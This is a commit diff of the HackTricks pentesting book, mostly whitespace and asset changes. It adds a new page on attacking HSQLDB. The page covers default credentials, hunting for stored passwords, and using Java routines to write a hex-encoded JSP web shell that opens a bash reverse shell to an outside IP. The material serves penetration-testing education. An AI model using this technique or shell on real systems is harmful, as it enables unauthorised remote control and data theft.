GitBook: [master] 20 pages and 40 assets modified
CPol
gitbook-bot
|
Before Width: | Height: | Size: 21 KiB After Width: | Height: | Size: 21 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 1.5 KiB After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
|
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
|
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 34 KiB |
|
Before Width: | Height: | Size: 17 KiB After Width: | Height: | Size: 17 KiB |
|
Before Width: | Height: | Size: 1.1 MiB After Width: | Height: | Size: 1.1 MiB |
|
Before Width: | Height: | Size: 123 KiB After Width: | Height: | Size: 123 KiB |
|
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 34 KiB |
|
Before Width: | Height: | Size: 5.2 KiB After Width: | Height: | Size: 5.2 KiB |
|
Before Width: | Height: | Size: 1.4 KiB After Width: | Height: | Size: 1.4 KiB |
|
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
|
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
|
Before Width: | Height: | Size: 813 KiB After Width: | Height: | Size: 813 KiB |
|
Before Width: | Height: | Size: 134 KiB After Width: | Height: | Size: 134 KiB |
|
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ Don't forget to **give ⭐ on the github** to motivate me to continue developing
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
|
|
@ -274,6 +274,7 @@
|
|||
* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
|
||||
* [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)
|
||||
* [8089 - Splunkd](pentesting/8089-splunkd.md)
|
||||
* [9001 - Pentesting HSQLDB](pentesting/9001-pentesting-hsqldb.md)
|
||||
* [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md)
|
||||
* [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md)
|
||||
* [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md)
|
||||
|
|
|
|||
|
|
@ -45,7 +45,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
|
|||
|
||||
And click on **compile**:
|
||||
|
||||
|
||||
|
||||
|
||||
Then save the new file on _**File >> Save module...**_:
|
||||
|
||||
|
|
|
|||
|
|
@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
|
|||
|
||||
**Only for Windows.**
|
||||
|
||||
|
||||
|
||||
|
||||
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
|
||||
|
||||
|
|
|
|||
|
|
@ -112,7 +112,7 @@ Attack Surface:
|
|||
|
||||
### Activities
|
||||
|
||||
An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
|
||||
An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
|
||||
|
||||
```markup
|
||||
<activity android:name="com.my.app.Initial" android:exported="true">
|
||||
|
|
@ -187,7 +187,7 @@ Take a look to the **drozer** help for `app.service.send`:
|
|||
|
||||
|
||||
|
||||
Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.
|
||||
Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.
|
||||
Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details.
|
||||
|
||||
In the following example:
|
||||
|
|
@ -278,7 +278,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo
|
|||
### Is debuggeable
|
||||
|
||||
A prodduction APK should never be debuggeable.
|
||||
This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code.
|
||||
This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code.
|
||||
|
||||
When an application is debuggable, it will appear in the Manifest:
|
||||
|
||||
|
|
|
|||
|
|
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
|||
|
||||
You should also check the **ContentProvider code** to search for queries:
|
||||
|
||||
|
||||
|
||||
|
||||
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
|
||||
|
||||
|
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Because you will be able to call them
|
||||
|
||||
|
|
|
|||
|
|
@ -60,7 +60,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
|
|
@ -132,7 +132,7 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
|
|||
* [**CBC-MAC**](crypto/cipher-block-chaining-cbc-mac-priv.md)
|
||||
* [**Padding Oracle**](crypto/padding-oracle-priv.md)
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
|
|
|
|||
|
|
@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
|
|||
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) ****with Java classes for being tested.
|
||||
|
||||
|
||||
|
||||
|
||||
### More Information
|
||||
|
||||
|
|
|
|||
|
|
@ -76,7 +76,7 @@ You could use one of the following characters to trick the webapp and exploit a
|
|||
|
||||
Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
|
||||
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
|||
|
|
@ -0,0 +1,80 @@
|
|||
# 9001 - Pentesting HSQLDB
|
||||
|
||||
## Basic Information
|
||||
|
||||
HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.
|
||||
|
||||
**Default port:** 9001
|
||||
|
||||
```text
|
||||
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
|
||||
```
|
||||
|
||||
## Information
|
||||
|
||||
#### Default Settings
|
||||
|
||||
Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
|
||||
|
||||
Default credentials are usually `sa` with a blank password.
|
||||
|
||||
If you’ve exploited another service, search for possible credentials using
|
||||
|
||||
```text
|
||||
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
|
||||
```
|
||||
|
||||
Note the database name carefully - you’ll need it to connect.
|
||||
|
||||
## Info Gathering
|
||||
|
||||
Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.
|
||||
|
||||
Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
|
||||
|
||||
## Tricks
|
||||
|
||||
### Java Language Routines
|
||||
|
||||
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.
|
||||
|
||||
JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
|
||||
|
||||
If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
|
||||
|
||||
### Reading Java System Properties
|
||||
|
||||
Create function:
|
||||
|
||||
```text
|
||||
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
|
||||
DETERMINISTIC NO SQL
|
||||
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
|
||||
```
|
||||
|
||||
Execute function:
|
||||
|
||||
```text
|
||||
VALUES(getsystemproperty('user.name'))
|
||||
```
|
||||
|
||||
You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
|
||||
|
||||
### Write Content to File
|
||||
|
||||
You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**.
|
||||
|
||||
Create procedure:
|
||||
|
||||
```text
|
||||
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
|
||||
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
|
||||
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
|
||||
```
|
||||
|
||||
Execute procedure:
|
||||
|
||||
```text
|
||||
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
|
||||
```
|
||||
|
||||
|
|
@ -45,7 +45,7 @@ responder -I <Iface> --wpad
|
|||
|
||||
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" \(most probably a **NTLMv2 Challenge/Response**\):
|
||||
|
||||
|
||||
|
||||
|
||||
## **Inveigh**
|
||||
|
||||
|
|
|
|||
|
|
@ -329,7 +329,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
|
|||
|
||||
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
|
||||
|
||||
|
||||
|
||||
|
||||
Once the handshake is captured you can **crack** it with `aircrack-ng`:
|
||||
|
||||
|
|
|
|||
|
|
@ -24,7 +24,7 @@ Accessing _/user/<number>_ you can see the number of existing users, in th
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Hidden pages enumeration
|
||||
|
||||
|
|
|
|||
|
|
@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -396,7 +396,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
|
|||
|
||||
Note the spotless' user membership:
|
||||
|
||||
|
||||
|
||||
|
||||
However, we can still add new users:
|
||||
|
||||
|
|
|
|||
|
|
@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||